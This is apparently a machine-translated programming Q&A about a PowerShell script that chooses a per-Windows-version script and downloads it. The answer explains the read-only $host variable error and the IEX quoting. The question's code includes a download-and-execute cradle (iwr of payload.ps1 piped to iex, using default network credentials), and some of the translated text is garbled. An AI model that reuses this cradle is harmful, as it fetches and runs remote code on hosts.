(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
获取Wmi对象Win32操作系统默认网络凭据
$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
if ($host -eq 'Microsoft Windows 7'){
Write-Host "[+] Downloading windows 7 script"
$URL = http://example.com
IEX (New-Object Net.WebClient).DownloadString('$URL')}
elseif ($host -eq 'Microsoft Windows 8'){
Write-Host "[+] Downloading windows 8 script"
等等...
这发生在$host是automatic variable。我的系统上的分配失败:
$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
Cannot overwrite variable Host because it is read-only or constant.
At line:1 char:1
+ $host = ((Get-WmiObject Win32_OperatingSystem).Caption)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (Host:String) [], SessionStateUnauthorizedAccessException
+ FullyQualifiedErrorId : VariableNotWritable
尝试使用另一个变量名称,例如$myHost。
从提供的代码中,在IEX命令中,将双引号添加到环绕声,因为Invoke-Expression的Command参数接受字符串,并将单引号添加到环绕$ URL。
$URL = "http://example.com"
IEX "(New-Object Net.WebClient).DownloadString('$URL')"
另外,运行Net.WebClient时不需要Invoke-Expression,您可以简化如下。
$URL = "http://example.com"
(New-Object Net.WebClient).DownloadString($URL)